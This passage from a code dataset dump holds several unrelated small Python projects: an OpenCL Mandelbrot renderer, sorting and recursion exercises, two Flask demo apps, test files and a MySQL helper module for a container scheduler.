verbose_name='Category'),\n preserve_default=True,\n ),\n ]\n","repo_name":"Kekc/tardis","sub_path":"blog/migrations/0002_auto_20150116_2226.py","file_name":"0002_auto_20150116_2226.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23139919653","text":"from PIL import Image\n\nimport numpy as np\nimport pyopencl as cl\nimport argparse\nimport PIL\n\nfilename = 'mandelbrot.bmp'\n\nwidth = 768\nheight = 512\n\nmaxIterations = 256\n\nkernelString = \"\"\"\nstatic inline int mandel(float c_re, float c_im, int count) {\n float z_re = c_re, z_im = c_im;\n int i;\n for (i = 0; i < count; ++i) {\n if (z_re * z_re + z_im * z_im > 4.)\n break;\n\n float new_re = z_re*z_re - z_im*z_im;\n float new_im = 2.f * z_re * z_im;\n\n z_re = c_re + new_re;\n z_im = c_im + new_im;\n }\n\n return i;\n}\nkernel void Mandelbrot(\n float x0, float y0,\n float x1, float y1,\n int width, int height,\n int maxIterations,\n global int* output)\n{\n float dx = (x1 - x0) / width;\n float dy = (y1 - y0) / height;\n\n float x = x0 + get_global_id(0) * dx;\n float y = y0 + get_global_id(1) * dy;\n\n int index = get_global_id(1) * width + get_global_id(0);\n output[index] = mandel(x, y, maxIterations);\n}\n\"\"\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--platform', type=int, action='store', default=0, help='Platform Index')\n parser.add_argument('-d', '--device', type=int, action='store', default=0, help='Device Index')\n\n args = parser.parse_args()\n platformIndex = args.platform\n deviceIndex = args.device\n\n platforms = cl.get_platforms()\n print('Running on platform: ' + platforms[platformIndex].get_info(cl.platform_info.NAME))\n\n devices = platforms[platformIndex].get_devices()\n print('Running on device: ' + devices[deviceIndex].get_info(cl.device_info.NAME))\n\n context = cl.Context([devices[deviceIndex]])\n commandQueue = cl.CommandQueue(context, devices[deviceIndex])\n\n program = cl.Program(context, kernelString)\n program.build()\n kernel = program.Mandelbrot\n\n deviceMemDst = cl.Buffer(context, cl.mem_flags.ALLOC_HOST_PTR, \n width * height * np.uint32().itemsize)\n\n # execution\n kernel(commandQueue, [width, height], None, \n np.float32(-2.0), np.float32(-1.0), np.float32(1.0), np.float32(1.0),\n np.int32(width), np.int32(height), np.int32(maxIterations), deviceMemDst)\n\n # save bitmap\n mapped_dst, event = cl.enqueue_map_buffer(commandQueue, deviceMemDst,\n cl.map_flags.READ, \n 0, width * height, np.uint32)\n with mapped_dst.base:\n colors = np.fromiter((240 if x & 1 else 20 for x in mapped_dst), np.uint8)\n image = Image.fromarray(colors.reshape((height, width)))\n image.save(filename)\n print('Wrote image file {}'.format(filename))\n","repo_name":"DorofeevKonstantin/4","sub_path":"12-OpenCL/python/mandelbrot.py","file_name":"mandelbrot.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72028469633","text":"\"\"\"\nhttps://blog.csdn.net/weixin_43250623/article/details/88931925\n基准元素,一般来说选取有几种方法:取第一个元素\n\n选择一个基准数,通过一趟排序后,\n将原序列分为两部分,使得前面的比后面的小,\n然后再依次对前后进行拆分进行快速排序,递归该过程,直到序列中所有记录均有序。\n\n\"\"\"\ndef quick_sort(alist, start, end):\n \"\"\"快速排序\"\"\"\n if start >= end: # 递归的退出条件\n return\n mid = alist[start] # !设定起始的基准元素\n i = start # i为序列左边在开始位置的由左向右移动的游标\n j = end # j为序列右边末尾位置的由右向左移动的游标\n while i < j:\n while i < j and alist[j] >= mid:\n # 如果i与j未重合,j(右边)指向的元素大于等于基准元素,则j向左移动\n j -= 1\n alist[i] = alist[j]\n # 走到此位置时j指向一个比基准元素小的元素,将j指向的元素放到i的位置上,\n # 此时j指向的位置空着,接下来移动i找到符合条件的元素放在此处\n\n while i < j and alist[i] <= mid:\n # 如果i与j未重合,i指向的元素比基准元素小,则i向右移动\n i += 1\n alist[j] = alist[i]\n # 此时i指向一个比基准元素大的元素,将i指向的元素放到j空着的位置上,\n # 此时i指向的位置空着,之后进行下一次循环,将j找到符合条件的元素填到此处\n\n # 退出循环后,i与j重合,此时所指位置为基准元素的正确位置,左边的元素都比基准元素小,右边的元素都比基准元素大\n alist[i] = mid # !将基准元素放到位置i=j,因为i已经赋值给其他;是mid不是alist[start]\n # 对基准元素左边的子序列进行快速排序\n quick_sort(alist, start, i - 1) # start :0 i -1 原基准元素靠左边一位\n # 对基准元素右边的子序列进行快速排序\n quick_sort(alist, i + 1, end) # i+1 : 原基准元素靠右一位 end: 最后\n\n\n\nif __name__ == '__main__':\n alist = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n quick_sort(alist, 0, len(alist) - 1)\n print(alist)\n","repo_name":"langdawang678/Py","sub_path":"algorithm/sort_quick.py","file_name":"sort_quick.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40038687952","text":"import time\n\ndef loop_solution(c, n):\n \"\"\"n x c =\n = c + c + c + ...\n :param c:\n :param n:\n :return:\n \"\"\"\n total = 0\n for i in range(n):\n total += c\n # print(i)\n return total\n\n\ndef recursive_solution(c, n):\n \"\"\"n x c =\n = (n - 1) x c + c\n = ((n - 2) x c + c) + c\n = ...\n :param c:\n :param n:\n :return:\n \"\"\"\n # print(n)\n if n == 1:\n return c\n else:\n return recursive_solution(c, n-1) + c\n\n\ndef tail_recursive_solution(c, n, r=0):\n # print(n, r)\n if n == 1:\n return c + r\n else:\n return tail_recursive_solution(c, n-1, c+r)\n\n\ndef good_solution(c, n):\n \"\"\"\n :param c:\n :param n:\n :return:\n \"\"\"\n return c * n\n\n\ndef evaluate_time(sol, title):\n c = 1\n n = 500\n\n print(title)\n time_start = time.time()\n r = sol(c, n)\n time_end = time.time()\n print('result: {}'.format(r))\n print('execution time: {}\\n'.format(time_end - time_start))\n\n\nif __name__ == '__main__':\n evaluate_time(good_solution, 'Good')\n evaluate_time(loop_solution, 'Loop')\n evaluate_time(recursive_solution, 'Recursive')\n evaluate_time(tail_recursive_solution, 'Tail Recursive')\n","repo_name":"wsunccake/myNote","sub_path":"lang/data_structure/recursive/total_c.py","file_name":"total_c.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"70382318276","text":"WIDHT = 900\nHEIGHT = 500 \nFPS = 60\n\nTITLE = 'COWBOY ZOMBIE!'\nBLACK = (0, 0, 0)\nBROWN_LIGHT = (231, 198, 75) \n\nZOMBIE_GRAV = 1.0\n\nSPEED = 5 \nMAX_CACTUS = 10\nMAX_BRAINS = 13\nFONT = 'Arial'\nTEXT_POSTY = 20","repo_name":"Carogirgon/VideoGame","sub_path":"game/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"2477045055","text":"class Solution:\n def numSquares(self, n: int) -> int:\n# solution 1: dp 4000 ms\n# squares = [i**2 for i in range(1, int(n**.5)+1)]\n# dp = [float('inf')] * (n+1)\n# dp[0] = 0\n \n# for i in range(1, n+1):\n# for square in squares:\n# if square > i:\n# break\n# dp[i] = min(dp[i], dp[i-square] + 1)\n# return dp[-1]\n\n# solution 2: greedy algorithm + bfs\n squares = [i**2 for i in range(1, int(n**.5)+1)]\n level = 0\n queue = [n]\n while queue:\n level += 1\n next_queue = set()\n for remainder in queue:\n for square in squares:\n if remainder == square:\n return level\n elif square > remainder:\n break\n else:\n next_queue.add(remainder - square)\n queue = list(tuple(next_queue))\n","repo_name":"OhYoooo/Leetcode","sub_path":"python/279.perfect-squares.py","file_name":"279.perfect-squares.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72687199874","text":"from flask import Flask, app, jsonify, request\r\nimport csv\r\n\r\nall_articles = []\r\nwith open(\"articles.csv\") as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n all_articles = data[1:]\r\n\r\nlike_articles = []\r\nunlike_articles = []\r\napp = Flask(__name__)\r\n@app.route(\"/get-articles\")\r\ndef get_article():\r\n return jsonify({\r\n \"data\": all_articles[0],\r\n \"status\": \"success\"\r\n })\r\n\r\n@app.route(\"/liked-articles\", methods=[\"POST\"])\r\ndef liked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n like_articles.append(article)\r\n return jsonify({\r\n \"status\": \"success\"\r\n }), 201\r\n\r\n@app.route(\"/unliked-articles\", methods=[\"POST\"])\r\ndef unliked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n unlike_articles.append(article)\r\n return jsonify({\r\n \"status\": \"success\"\r\n }), 201\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"Tp-13/P141","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30619903056","text":"from flask import Flask, render_template, request\nimport jsonify\nimport requests\nimport pickle\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import StandardScaler\napp = Flask(__name__)\nmodel = pickle.load(open('svm.pkl', 'rb'))\n\n\n@app.route('/', methods=['GET'])\ndef Home():\n return render_template('index.html')\n\n\nstandard_to = StandardScaler()\n\n\n@app.route(\"/predict\", methods=['POST'])\ndef predict():\n\n if request.method == 'POST':\n Pregnancies = int(request.form['Pregnancies'])\n Glucose = int(request.form['Glucose'])\n BloodPressure = int(request.form['BloodPressure'])\n DiabetesPedigreeFunction = float(\n request.form['DiabetesPedigreeFunction'])\n SkinThickness = int(request.form['SkinThickness'])\n Insulin = int(request.form['Insulin'])\n BMI = float(request.form['BMI'])\n Age = int(request.form['Age'])\n\n prediction = model.predict(\n [[Pregnancies, Glucose, BloodPressure, DiabetesPedigreeFunction, SkinThickness, Insulin, BMI, Age]])\n print(prediction)\n if prediction[0] == 0:\n return render_template('index.html', prediction_texts=\"The patient does not have diabetes\")\n elif prediction[0] == 1:\n return render_template('index.html', prediction_texts=\"The patient is diagnosed with diabetes\")\n\n else:\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"deeppudasaini/Diabetes-Prediction-Model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27079682766","text":"import pyqtgraph.opengl as gl\nimport numpy as np\n\n\nclass RobotArm:\n # ------------------------------\n # Overview\n # ------------------------------\n\n # This will be the class responsible for the following\n # - Adding render of arm to frame\n # - Calculating joint angles\n # - Looking cool\n\n # ------------------------------\n # User Variables\n # ------------------------------\n\n base_joint_height_off_ground = None\n arm_one_length = None\n arm_two_length = None\n paddle_length = None\n distance_from_table = 10 # Inches\n\n # Init method (in inches)\n def __init__(self, base_height, arm1len, arm2len, paddle_len):\n # Set vars\n self.base_joint_height_off_ground = base_height\n self.arm_one_length = arm1len\n self.arm_two_length = arm2len\n self.paddle_length = paddle_len\n\n # Render Creator\n def init_arm(self, w):\n initPoints = np.array([(0, 0, 0), (0, 0, 0)]) # init at 0, 0, 0\n line = gl.GLLinePlotItem(pos=initPoints, width=1)\n w.addItem(line)\n\n return line","repo_name":"ChrisPal323/Ping_Pong_Tracking","sub_path":"robot_arm.py","file_name":"robot_arm.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18535336366","text":"from pathlib import Path\n\nimport pytest\n\nfrom holdingsparser.application import get_save_path\n\n\ndef test_get_save_path_dir(tmp_path):\n term = \"some_term\"\n file_format = \"dsv\"\n\n result = get_save_path(tmp_path, term, file_format)\n\n assert result == tmp_path / Path(f\"{term}_holdings.{file_format}\")\n\n\ndef test_get_save_path_file(tmp_path):\n term = \"some_term\"\n file_format = \"dsv\"\n file_path = tmp_path / \"some_file\"\n\n result = get_save_path(file_path, term, file_format)\n\n assert result == file_path\n\n\ndef test_get_save_path_missing(tmp_path):\n term = \"some_term\"\n file_format = \"dsv\"\n file_path = tmp_path / \"doesnt_exist\" / \"some_file\"\n\n with pytest.raises(RuntimeError) as e:\n _ = get_save_path(file_path, term, file_format)\n\n assert str(e.value).endswith(\"is an invalid path\")\n","repo_name":"mhadam/holdingsparser","sub_path":"tests/integration/test_application.py","file_name":"test_application.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"9944094937","text":"import dill\nimport logging\nimport mysql.connector\nfrom classes.application import Application\nfrom classes.user import User\nfrom classes.request import Request\nfrom configparser import ConfigParser\nfrom datetime import timedelta, datetime\n\nparser = ConfigParser()\nparser.read('./config/local-config.txt')\n\nif parser['Container']['type'] == 'DOCKER':\n\tfrom classes.container import ContainerDocker as Container\n\nelif parser['Container']['type'] == 'LXC':\n\tfrom classes.container import ContainerLXC as Container\n\n\n# ---------- Database Connection Fuctions ----------\n# Function for connect to global database\n\n\ndef get_connection():\n\tconfig = ConfigParser()\n\tconfig.read('./config/global-config.txt')\n\n\ttry:\n\t\tconn = mysql.connector.connect(host=config['Database']['hostname'],\n\t\t\t\t\t\t\t\t\t\tdatabase=config['Database']['database'],\n\t\t\t\t\t\t\t\t\t\tuser=config['Database']['user'],\n\t\t\t\t\t\t\t\t\t\tpassword=config['Database']['password'])\n\t\treturn conn\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Connection to Database Error: %s', err)\n\n\n# Function for connect to local database\n\n\ndef get_local_connection():\n\tconfig = ConfigParser()\n\tconfig.read('./config/local-config.txt')\n\n\ttry:\n\t\tconn = mysql.connector.connect(host=config['Localbase']['hostname'],\n\t\t\t\t\t\t\t\t\t\tdatabase=config['Localbase']['database'],\n\t\t\t\t\t\t\t\t\t\tuser=config['Localbase']['user'],\n\t\t\t\t\t\t\t\t\t\tpassword=config['Localbase']['password'])\n\t\treturn conn\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Connection to Local Database Error: %s', err)\n\n\n# ---------- Database Publishing Functions ----------\n# Function to save host monitoring data on global database\n\n\ndef publish_host(hostname: str, data):\n\tquery = \"UPDATE host SET hostdata = %s WHERE hostname = %s\"\n\tinfo = (data, hostname)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.debug('Host Data %s Updated on Database', hostname)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Publishing Host %s on Database Error: %s', hostname, err)\n\n\n# Function to save container history monitoring data on global database\n\n\ndef publish_container_history(container):\n\tquery = \"INSERT INTO container_history (cid, logdata) VALUES (%s, %s)\"\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\n\t\t\tif not container.state in ['NEW', 'CREATED']:\n\t\t\t\tserial_container = dill.dumps(container)\n\t\t\t\tinfo = (container.cid, serial_container)\n\t\t\t\tcursor.execute(query, info)\n\n\t\t\tconn.commit()\n\t\t\tlogging.debug('%s Container History Data Inserted on Database', container.name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Publishing Containers History on Database Error: %s', err)\n\n\n# Function to save container history monitoring data on local database\n\n\ndef publish_local_container_history(container: Container):\n\tquery = \"INSERT INTO container_history (name, data) VALUES (%s, %s)\"\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\n\t\t\tif not container.state in ['NEW', 'CREATED']:\n\t\t\t\tserial_container = dill.dumps(container)\n\t\t\t\tinfo = (container.name, serial_container)\n\t\t\t\tcursor.execute(query, info)\n\n\t\t\tconn.commit()\n\t\t\tlogging.debug('%s Container History Data Inserted on Local Database', container.name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Publishing Containers History on Local Database Error: %s', err)\n\n\n# ---------- User Table Functions ----------\n# Function to create a user on global database\n\n\ndef create_user(user: User):\n\tquery = \"INSERT INTO user (login, password, username, usertype) VALUES (%s, password(%s), %s, %s)\"\n\tinfo = (user.login, user.password, user.name, user.type)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\tuid = item[0]\n\t\t\tlogging.info('User %s Created with the ID %s on Database')\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn uid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating User %s on Database Error: %s', user.login, err)\n\n\n# Function for login and password check from a user\n\n\ndef check_login(login: str, password: str):\n\tquery = \"SELECT userid FROM user WHERE login = %s AND password = password(%s)\"\n\t#query = \"SELECT IF((SELECT password FROM user WHERE login = %s) = password(%s), True, False)\"\n\tinfo = (login, password)\n\tuid = None\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\titem = cursor.fetchone()\n\n\t\t\tif item:\n\t\t\t\tuid = item[0]\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Login %s Check on Database Error: %s', login, err)\n\n\tfinally:\n\t\tif not uid:\n\t\t\tlogging.info('User Login %s Not Found', login)\n\t\treturn uid\n\n\n# Function to update a user information\n\n\ndef update_user(user: User):\n\tquery = \"UPDATE user SET login = %s, password = %s, username = %s, usertype = %s WHERE userid = %s\"\n\tinfo = (user.login, user.password, user.name, user.type, user.userid)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tprint('User %s Updated on Database', user.login)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Update User %s Information on Database Error: %s', user.login, err)\n\n\n# ---------- Application Table Functions ----------\n# Function to create an application on global database\n\n\ndef create_application(app: Application):\n\tquery = \"INSERT INTO application (appname, apptype, image, min_memory, num_cores, comments) VALUES (%s, %s, %s, %s, %s, %s)\"\n\tinfo = (app.name, app.type, app.image, app.min_memory, app.num_cores, app.comments)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tcursor.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\tappid = item[0]\n\t\t\tlogging.info('Application %s Created on Database', app.name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn appid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating Application %s on Database Error: %s', app.name, err)\n\n\n# Function to list the stored applications\n\n\ndef list_applications():\n\tquery = \"SELECT * FROM application\"\n\tapp_list = []\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query)\n\n\t\t\tfor item in cursor:\n\t\t\t\tapp = Application()\n\t\t\t\tapp.appid = item[0]\n\t\t\t\tapp.name = item[1]\n\t\t\t\tapp.type = item[2]\n\t\t\t\tapp.image = item[3]\n\t\t\t\tapp.min_memory = item[4]\n\t\t\t\tapp.num_cores = item[5]\n\t\t\t\tapp.comments = item[6]\n\t\t\t\t# print('Application: ', vars(app))\n\t\t\t\tapp_list.append(app)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting Application List on Database Error: %s', err)\n\n\tfinally:\n\t\tif not app_list:\n\t\t\tlogging.info('Not Find any Application on Database')\n\t\treturn app_list\n\n\n# Fuction to get an application information\n\n\ndef get_application_from_ID(appid: int):\n\tquery = \"SELECT * FROM application WHERE id = %s\"\n\tinfo = (appid,)\n\tapplication = Application()\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\titem = cursor.fetchone()\n\n\t\t\tif item:\n\t\t\t\tapplication.appid = item[0]\n\t\t\t\tapplication.name = item[1]\n\t\t\t\tapplication.type = item[2]\n\t\t\t\tapplication.image = item[3]\n\t\t\t\tapplication.min_memory = item[4]\n\t\t\t\tapplication.num_cores = item[5]\n\t\t\t\tapplication.comments = item[6]\n\t\t\t\t# print('Application: ', vars(application))\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting Application %s Info on Database Error: %s', appid, err)\n\n\tfinally:\n\t\treturn application\n\n\n# ---------- Request Table Functions ----------\n# Function to create a request on global database\n\n\ndef create_request(request: Request):\n\tquery = \"INSERT INTO request (uid, reqname, num_containers) VALUES (%s, %s, %s)\"\n\tinfo = (request.user, request.name, request.num_containers)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\treqid = item[0]\n\t\t\tlogging.info('Request %s Created on Database', reqid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn reqid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating the Request %s on Database Error: %s', request.name, err)\n\n\n# Function to update a request status\n\n\ndef update_request_status(reqid: int, status: str):\n\tinfo = (status, reqid)\n\n\tif status == 'SCHEDULED':\n\t\tquery = \"UPDATE request SET reqstatus = %s, start_time = CURRENT_TIMESTAMP WHERE reqid = %s\"\n\n\telif status in ['FINISHED','ERROR']:\n\t\tquery = \"UPDATE request SET reqstatus = %s, end_time = CURRENT_TIMESTAMP WHERE reqid = %s\"\n\n\telse:\n\t\tquery = \"UPDATE request SET reqstatus = %s WHERE reqid = %s\"\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.debug('Request %s Status Updated on Database', reqid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Updating Status from Request %s on Database Error: %s', reqid, err)\n\n\n# Function to get new requests from global database\n\n\ndef get_new_requests():\n\tquery = \"SELECT reqid, uid, reqname, reqstatus, num_containers FROM request WHERE reqstatus = 'NEW' ORDER BY reqid\"\n\treq_list = []\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query)\n\n\t\t\tfor item in cursor:\n\t\t\t\trequest = Request()\n\t\t\t\trequest.reqid = item[0]\n\t\t\t\trequest.user = item[1]\n\t\t\t\trequest.name = item[2]\n\t\t\t\trequest.status = item[3]\n\t\t\t\trequest.num_containers = item[4]\n\t\t\t\tprint('Request: ', vars(request))\n\t\t\t\treq_list.append(request)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting New Requests on Database Error: %s', err)\n\n\tfinally:\n\t\tif not req_list:\n\t\t\tlogging.debug('Not find any New Request on Database')\n\t\treturn req_list\n\n\n# ---------- Container Table Functions ----------\n# Function to create a container on global database\n\n\ndef create_container(reqid: int, appid: int, name: str, command: str, est_time: timedelta):\n\tquery = \"INSERT INTO container (rid, aid, containername, command, estimated_time) VALUES (%s, %s, %s, %s, %s)\"\n\tinfo = (reqid, appid, name, command, est_time)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\tcid = item[0]\n\t\t\tlogging.info('Container %s Created with ID %s on Database', name, cid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn cid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating Container %s on Database Error: %s', name, err)\n\n\n# Function to update a container status\n\n\ndef update_container_status(container: Container):\n\tquery = \"\"\n\tinfo = ()\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\n\t\t\tif container.state == 'RUNNING':\n\t\t\t\tquery = \"UPDATE container SET status = %s, start_time = %s WHERE containerid = %s\"\n\t\t\t\tinfo = (container.state, container.start_time, container.cid)\n\n\t\t\telif container.state in ['STOPPED','ERROR']:\n\t\t\t\tquery = \"UPDATE container SET status = %s, end_time = CURRENT_TIMESTAMP WHERE containerid = %s\"\n\t\t\t\tinfo = (container.state, container.cid)\n\n\t\t\telse:\n\t\t\t\tquery = \"UPDATE container SET status = %s WHERE containerid = %s\"\n\t\t\t\tinfo = (container.state, container.cid)\n\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.info('Container %s Status Updated on Database', container.cid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Updating Container %s Status on Database Error: %s', container.cid, err)\n\n\n# Function to get the containers from a particular request\n\n\ndef get_containers_from_request(reqid: int):\n\tquery = \"SELECT c.containerid, c.containername, c.command, c.status, c.estimated_time, a.image, a.min_memory, a.max_memory, a.num_cores, a.apptype \\\n\t\t\tFROM container c, application a WHERE c.rid = %s AND a.appid = c.aid ORDER BY c.containerid\"\n\tinfo = (reqid,)\n\tcontainer_list = []\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = Container()\n\t\t\t\tcontainer.cid = item[0]\n\t\t\t\tcontainer.name = item[1]\n\t\t\t\tcontainer.command = item[2]\n\t\t\t\tcontainer.state = item[3]\n\t\t\t\tcontainer.estimated_time = item[4]\n\t\t\t\tcontainer.template = item[5]\n\t\t\t\tcontainer.min_mem_limit = item[6]\n\t\t\t\tcontainer.max_mem_limit = item[7]\n\t\t\t\tcontainer.request_cpus = item[8]\n\t\t\t\tcontainer.apptype = item[9]\n\t\t\t\t#print('Container: ', vars(container))\n\t\t\t\tcontainer_list.append(container)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting Containers from Request %s on Database Error: %s', reqid, err)\n\n\tfinally:\n\t\tif not container_list:\n\t\t\tlogging.debug('Not find any Container from Request %s on Database', reqid)\n\t\treturn container_list\n\n\n# Function to get a container stored data from global database\n\n\ndef get_container_history(cid: int):\n\tquery = \"SELECT logdata, time FROM container_history WHERE cid = %s\"\n\tinfo = (cid,)\n\n\ttime_list = []\n\tdata_list = []\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Database Error: %s', cid, err)\n\n\tfinally:\n\t\tif not data_list and not time_list:\n\t\t\tlogging.info('Not Find any Container History for %s on Database', cid)\n\t\treturn data_list, time_list\n\n\ndef get_local_container_history(name: str):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s\"\n\tinfo = (name,)\n\n\ttime_list = []\n\tdata_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tif not data_list and not time_list:\n\t\t\tlogging.info('Not Find any Container History for %s on Local Database', name)\n\t\treturn data_list, time_list\n\n\ndef get_local_container_history_interval(name, window_length):\n\t#query = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tquery = \"SELECT data, time from container_history WHERE name = %s AND time >= %s ORDER BY time DESC\"\n\tinfo = (name, window_length)\n\n\ttime_list = []\n\tdata_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in 